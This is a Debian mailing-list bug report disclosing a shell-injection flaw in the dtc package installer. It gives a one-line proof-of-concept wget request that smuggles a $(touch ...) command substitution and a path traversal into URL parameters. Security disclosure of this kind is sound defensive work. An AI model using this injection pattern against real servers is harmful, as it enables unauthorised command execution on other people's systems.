[Secure-testing-team] Bug#637630: shell injection in package installer
Ansgar Burchardt
ansgar at debian.org
Sat Aug 13 09:00:01 UTC 2011
Package: src:dtc
Version: 0.32.10-2
Severity: critical
Tags: security upstream
The package installer helpfully allows users to run shell code:
wget -q -O- 'http://localhost:8080/dtc/?adm_login=asd&adm_pass=asdf&action=do_install&pkg=../../../../../../../../../tmp&addrlink=asd.com/package-installer&dtcpkg_directory=$(touch /tmp/more-owned)/tmp/foo&subdomain=www'
Ansgar
More information about the Secure-testing-team
mailing list